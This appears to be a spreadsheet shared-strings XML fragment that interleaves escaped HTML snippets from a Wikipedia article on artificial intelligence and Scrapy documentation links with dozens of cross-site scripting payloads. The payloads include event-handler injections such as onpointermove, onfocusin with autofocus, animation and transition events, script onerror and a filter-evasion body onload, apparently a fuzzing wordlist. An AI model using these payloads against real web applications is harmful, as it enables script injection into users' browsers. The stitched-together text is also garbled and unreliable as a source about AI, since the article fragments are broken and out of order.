    <t xml:space="preserve">&lt;li id="cite_note-358"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-358"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;fieldset onpointermove=alert(1)&gt;XSS&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Stafford_Beer" title="Stafford Beer"&gt;Anthony Stafford Beer &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onpointerup=alert(1)&gt;XSS&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;kbd ondblclick="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;source draggable="true" ondragleave="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Claude_Bernard" title="Claude Bernard"&gt;Claude Bernard &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;caption id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Explanatory notes </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;211–239 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;aside draggable="true" ondragstart="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;sub ondrop=alert(1) contenteditable&gt;drop here&lt;/sub&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite class="citation web"&gt;Tom Simonite (29 December 2014). &lt;a rel="nofollow" class="external text" href="http://www.technologyreview.com/news/533686/2014-in-computing-breakthroughs-in-artificial-intelligence/"&gt;"2014 in Computing: Breakthroughs in Artificial Intelligence" &lt;/a&gt;. &lt;i&gt;MIT Technology Review &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=MIT+Technology+Review&amp;amp;rft.atitle=2014+in+Computing%3A+Breakthroughs+in+Artificial+Intelligence&amp;amp;rft.date=2014-12-29&amp;amp;rft.au=Tom+Simonite&amp;amp;rft_id=http%3A%2F%2Fwww.technologyreview.com%2Fnews%2F533686%2F2014-in-computing-breakthroughs-in-artificial-intelligence%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;noscript onmouseenter="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;video&gt;&lt;source onerror=alert(1) src=1&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;The potential negative effects of AI and automation were a major issue for &lt;a href="/wiki/Andrew_Yang" title="Andrew Yang"&gt;Andrew Yang &lt;/a&gt;'s &lt;a href="/wiki/Andrew_Yang_2020_presidential_campaign" title="Andrew Yang 2020 presidential campaign"&gt;2020 presidential campaign &lt;/a&gt; in the United States.&lt;sup id="cite_ref-362" class="reference"&gt;&lt;a href="#cite_note-362"&gt;&amp;#91;351&amp;#93; &lt;/a&gt; &lt;/sup&gt; Irakli Beridze, Head of the Centre for Artificial Intelligence and Robotics at UNICRI, United Nations, has expressed that "I think the dangerous applications for AI, from my point of view, would be criminals or large terrorist organizations using it to disrupt large processes or simply do pure harm. [Terrorists could cause harm] via digital warfare, or it could be a combination of robotics, drones, with AI and other things as well that could be really dangerous. And, of course, other risks come from things like job losses. If we have massive numbers of people losing jobs and don't find a solution, it will be extremely dangerous. Things like lethal autonomous weapons systems should be properly governed — otherwise there's massive potential of misuse."&lt;sup id="cite_ref-363" class="reference"&gt;&lt;a href="#cite_note-363"&gt;&amp;#91;352&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;caption draggable="true" ondrag="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/2007arXiv0706.3639L"&gt;2007arXiv0706.3639L &lt;/a&gt;. 07-07. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=report&amp;amp;rft.btitle=A+Collection+of+Definitions+of+Intelligence&amp;amp;rft.pub=IDSIA&amp;amp;rft.date=2007-06-15&amp;amp;rft_id=info%3Aarxiv%2F0706.3639&amp;amp;rft_id=info%3Abibcode%2F2007arXiv0706.3639L&amp;amp;rft.aulast=Legg&amp;amp;rft.aufirst=Shane&amp;amp;rft.au=Hutter%2C+Marcus&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;dd&gt;We need not decide if a machine can "think"; we need only decide if a machine can act as intelligently as a human being. This approach to the philosophical problems associated with artificial intelligence forms the basis of the &lt;a href="/wiki/Turing_test" title="Turing test"&gt;Turing test &lt;/a&gt;.&lt;sup id="cite_ref-Turing_test_351-0" class="reference"&gt;&lt;a href="#cite_note-Turing_test-351"&gt;&amp;#91;340&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/dd&gt; &lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_psychiatry" title="Philosophy of psychiatry"&gt;Psychiatry &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Forward_chaining" title="Forward chaining"&gt;Forward chaining &lt;/a&gt;, &lt;a href="/wiki/Backward_chaining" title="Backward chaining"&gt;backward chaining &lt;/a&gt;, &lt;a href="/wiki/Horn_clause" title="Horn clause"&gt;Horn clauses &lt;/a&gt;, and logical deduction as search:</t>
  </si>
  <si>
    <t>&lt;em id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">            &lt;div id="p-namespaces" role="navigation" class="vectorTabs " aria-labelledby="p-namespaces-label"&gt;</t>
  </si>
  <si>
    <t>&lt;code draggable="true" ondragenter="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-places-developers"&gt;&lt;a href="https://www.mediawiki.org/wiki/Special:MyLanguage/How_to_contribute"&gt;Developers &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;br id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;tt id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/tt&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;video style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;a href="/wiki/Wikipedia:Protection_policy#pending" title="All edits by unregistered and new users are subject to review prior to becoming visible to unregistered users"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFLucas1961" class="citation book"&gt;&lt;a href="/wiki/John_Lucas_(philosopher)" title="John Lucas (philosopher)"&gt;Lucas, John &lt;/a&gt; (1961). "Minds, Machines and Gödel".  In Anderson, A.R. (ed.). &lt;a rel="nofollow" class="external text" href="http://users.ox.ac.uk/~jrlucas/Godel/mmg.html"&gt;&lt;i&gt;Minds and Machines &lt;/i&gt; &lt;/a&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20070819165214/http://users.ox.ac.uk/~jrlucas/Godel/mmg.html"&gt;Archived &lt;/a&gt; from the original on 19 August 2007&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 August </t>
  </si>
  <si>
    <t>&lt;col onpointerout=alert(1)&gt;XSS&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;nobr id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;embed onpointerenter=alert(1)&gt;XSS&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;label onkeypress="alert(1)" contenteditable&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;u onpointerover=alert(1)&gt;XSS&lt;/u&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Computable_knowledge" style="font-size:114%;margin:0 4em"&gt;Computable knowledge &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Topics and&lt;br /&gt;concepts &lt;/th&gt;&lt;td class="navbox-list navbox-odd hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;object data=/ onload=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span id="Reasoning.2C_problem_solving"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 and other &lt;a href="/wiki/Industrial_robot" title="Industrial robot"&gt;industrial robots &lt;/a&gt;, widely used in modern factories, can learn from experience how to move efficiently despite the presence of friction and gear slippage.&lt;sup id="cite_ref-Configuration_space_129-0" class="reference"&gt;&lt;a href="#cite_note-Configuration_space-129"&gt;&amp;#91;126&amp;#93; &lt;/a&gt; &lt;/sup&gt; A modern mobile robot, when given a small, static, and visible environment, can easily determine its location and &lt;a href="/wiki/Robotic_mapping" title="Robotic mapping"&gt;map &lt;/a&gt; its environment; however, dynamic environments, such as (in &lt;a href="/wiki/Endoscopy" title="Endoscopy"&gt;endoscopy &lt;/a&gt;) the interior of a patient's breathing body, pose a greater challenge. &lt;a href="/wiki/Motion_planning" title="Motion planning"&gt;Motion planning &lt;/a&gt; is the process of breaking down a movement task into "primitives" such as individual joint movements. Such movement often involves compliant motion, a process where movement requires maintaining physical contact with an object.&lt;sup id="cite_ref-FOOTNOTETecuci2012_130-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTETecuci2012-130"&gt;&amp;#91;127&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Robotic_mapping_131-0" class="reference"&gt;&lt;a href="#cite_note-Robotic_mapping-131"&gt;&amp;#91;128&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="cs1-visible-error error citation-comment"&gt;Missing or empty &lt;code class="cs1-code"&gt;&amp;#124;title= &lt;/code&gt; (&lt;a href="/wiki/Help:CS1_errors#citation_missing_title" title="Help:CS1 errors"&gt;help &lt;/a&gt;) </t>
  </si>
  <si>
    <t>&lt;time onpointerout=alert(1)&gt;XSS&lt;/time&gt;</t>
  </si>
  <si>
    <t>onFocus()</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Interpreter_(computing)" title="Interpreter (computing)"&gt;Interpreter &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dir id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onpointerover=alert(1)&gt;XSS&lt;/datalist&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(2001) &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;"33 Corporations Working On Autonomous Vehicles". CB Insights. N.p., 11 August 2016. 12 November 2016. </t>
  </si>
  <si>
    <t>&lt;col onpointermove=alert(1)&gt;XSS&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;frame draggable="true" ondrag="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;style onkeypress="alert(1)" contenteditable&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;font onpointerup=alert(1)&gt;XSS&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;noscript id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("")&gt;</t>
  </si>
  <si>
    <t>&lt;datalist oncopy="alert(1)" contenteditable&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Another factor that is influencing the ability of a driver-less automobile is the safety of the passenger. To make a driver-less automobile, engineers must program it to handle high-risk situations. These situations could include a head-on collision with pedestrians. The car's main goal should be to make a decision that would avoid hitting the pedestrians and saving the passengers in the car. But there is a possibility the car would need to make a decision that would put someone in danger. In other words, the car would need to decide to save the pedestrians or the passengers.&lt;sup id="cite_ref-313" class="reference"&gt;&lt;a href="#cite_note-313"&gt;&amp;#91;302&amp;#93; &lt;/a&gt; &lt;/sup&gt; The programming of the car in these situations is crucial to a successful driver-less automobile.</t>
  </si>
  <si>
    <t>&lt;frame onkeydown="alert(1)" contenteditable&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;body onpaste="alert(1)" contenteditable&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;center ondblclick="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;div id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;". &lt;i&gt;Science Fiction Studies &lt;/i&gt;. &lt;b&gt;24 &lt;/b&gt; (3): 413–429. &lt;a href="/wiki/JSTOR" title="JSTOR"&gt;JSTOR &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//www.jstor.org/stable/4240644"&gt;4240644 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Science+Fiction+Studies&amp;amp;rft.atitle=Entering+the+Posthuman+Collective+in+Philip+K.+Dick%27s+%22Do+Androids+Dream+of+Electric+Sheep%3F%22&amp;amp;rft.volume=24&amp;amp;rft.issue=3&amp;amp;rft.pages=413-429&amp;amp;rft.date=1997-01-01&amp;amp;rft_id=%2F%2Fwww.jstor.org%2Fstable%2F4240644&amp;amp;rft.aulast=Galvan&amp;amp;rft.aufirst=Jill&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;ul style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;nav id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;caption id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onstart=alert(1)&gt;XSS&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_areas_of_mathematics" title="Glossary of areas of mathematics"&gt;Mathematics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Walter_Pitts" title="Walter Pitts"&gt;Walter Pitts &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ruby ondblclick="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;img2 onpointerenter=alert(1)&gt;XSS&lt;/img2&gt;</t>
  </si>
  <si>
    <t>&lt;br onkeydown="alert(1)" contenteditable&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;option id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFRussellNorvig2009"&gt;Russell &amp;amp; Norvig 2009 &lt;/a&gt;, p.&amp;#160;2. </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Genetic_algorithm" title="Genetic algorithm"&gt;Genetic algorithm &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;take an empty corner if one exists. Otherwise, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-42"&gt;&lt;a href="#Video_games"&gt;&lt;span class="tocnumber"&gt;7.7 </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=50" title="Edit section: Potential harm"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;&lt;a href="/wiki/Hierarchical_temporal_memory" title="Hierarchical temporal memory"&gt;Hierarchical temporal memory &lt;/a&gt; is an approach that models some of the structural and algorithmic properties of the &lt;a href="/wiki/Neocortex" title="Neocortex"&gt;neocortex &lt;/a&gt;.&lt;sup id="cite_ref-Hierarchical_temporal_memory_244-0" class="reference"&gt;&lt;a href="#cite_note-Hierarchical_temporal_memory-244"&gt;&amp;#91;233&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;script id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/script&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/jobs.html"&gt;Jobs: pausing and resuming crawls&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;img onpointerup=alert(1)&gt;XSS&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;ins onpointerup=alert(1)&gt;XSS&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;animate onend=alert(1) attributeName=x dur=1s&gt;</t>
  </si>
  <si>
    <t>&lt;embed onkeypress="alert(1)" contenteditable&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;center id=x tabindex=1 onactivate=alert(1)&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=64" title="Edit section: Robot rights"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;legend onbeforecopy="alert(1)" contenteditable&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Friendly_artificial_intelligence" title="Friendly artificial intelligence"&gt;Friendly AI &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Algorithmic_efficiency" title="Algorithmic efficiency"&gt;Algorithmic efficiency &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onmousedown="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_chemistry_terms" title="Glossary of chemistry terms"&gt;Chemistry &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;td id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;script x&gt; alert(1) &lt;/script 1=2</t>
  </si>
  <si>
    <t>&lt;col onmouseover="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;dfn draggable="true" ondragleave="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/autothrottle.html"&gt;AutoThrottle extension&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;param onpaste="alert(1)" contenteditable&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;script onerror=alert(1) src=/&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;select ondrop=alert(1) contenteditable&gt;drop here&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;strong id=x tabindex=1 onactivate=alert(1)&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTETecuci2012-130"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-FOOTNOTETecuci2012_130-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-FOOTNOTETecuci2012_130-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;blockquote onmouseenter="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;link rel="stylesheet" href="/w/load.php?lang=en&amp;amp;modules=site.styles&amp;amp;only=styles&amp;amp;skin=vector"/&gt;</t>
  </si>
  <si>
    <t>&lt;dd draggable="true" ondrag="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Post, Washington. &lt;a rel="nofollow" class="external text" href="http://www.chicagotribune.com/bluesky/technology/ct-tech-titans-against-terminators-20151214-story.html"&gt;"Tech titans like Elon Musk are spending $1 billion to save you from terminators" &lt;/a&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160607121118/http://www.chicagotribune.com/bluesky/technology/ct-tech-titans-against-terminators-20151214-story.html"&gt;Archived &lt;/a&gt; from the original on 7 June 2016. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=Tech+titans+like+Elon+Musk+are+spending+%241+billion+to+save+you+from+terminators&amp;amp;rft.aulast=Post&amp;amp;rft.aufirst=Washington&amp;amp;rft_id=http%3A%2F%2Fwww.chicagotribune.com%2Fbluesky%2Ftechnology%2Fct-tech-titans-against-terminators-20151214-story.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;meta onpointerdown=alert(1)&gt;XSS&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Cybermethodology" title="Cybermethodology"&gt;Cybermethodology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;animate onpointerover=alert(1)&gt;XSS&lt;/animate&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onpointerover=alert(1)&gt;XSS&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Solid_modeling" title="Solid modeling"&gt;Solid modeling &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;q onbeforecut="alert(1)" contenteditable&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;li ondblclick="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;h3  id="p-tb-label"&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;link ondrop=alert(1) contenteditable&gt;drop here&lt;/link&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1145%2F3122814"&gt;10.1145/3122814 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Communications+of+the+ACM&amp;amp;rft.atitle=Moving+beyond+the+Turing+Test+with+the+Allen+AI+Science+Challenge&amp;amp;rft.volume=60&amp;amp;rft.issue=9&amp;amp;rft.pages=60-64&amp;amp;rft.date=2017-08-23&amp;amp;rft_id=info%3Aarxiv%2F1604.04315&amp;amp;rft_id=info%3Adoi%2F10.1145%2F3122814&amp;amp;rft.aulast=Schoenick&amp;amp;rft.aufirst=Carissa&amp;amp;rft.au=Clark%2C+Peter&amp;amp;rft.au=Tafjord%2C+Oyvind&amp;amp;rft.au=Turney%2C+Peter&amp;amp;rft.au=Etzioni%2C+Oren&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ruby draggable="true" ondrag="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;ins onkeydown="alert(1)" contenteditable&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;cite id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;dir draggable="true" ondragenter="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-385"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-385"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;colgroup onpointerdown=alert(1)&gt;XSS&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;div onclick="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=latimes.com&amp;amp;rft.atitle=Palantir+once+mocked+the+idea+of+salespeople.+Now+it%27s+hiring+them&amp;amp;rft.date=2019-01-07&amp;amp;rft.aulast=Chapman&amp;amp;rft.aufirst=Lizette&amp;amp;rft_id=https%3A%2F%2Fwww.latimes.com%2Fbusiness%2Fla-fi-palantir-sales-ipo-20190107-story.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;font onmouseover="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Hard_problem_of_consciousness" title="Hard problem of consciousness"&gt;Hard problem of consciousness &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onpointerup=alert(1)&gt;XSS&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;details onmousedown="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;th onclick="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Subfields_of_and_cyberneticians_involved_in_cybernetics" style="font-size:114%;margin:0 4em"&gt;Subfields of and cyberneticians involved in &lt;a href="/wiki/Cybernetics" title="Cybernetics"&gt;cybernetics &lt;/a&gt; &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Subfields &lt;/th&gt;&lt;td class="navbox-list navbox-odd hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;progress onbeforecopy="alert(1)" contenteditable&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>Revival of &lt;a href="/wiki/Connectionism" title="Connectionism"&gt;connectionism &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;image onpointerover=alert(1)&gt;XSS&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onpointerleave=alert(1)&gt;XSS&lt;/nobr&gt;</t>
  </si>
  <si>
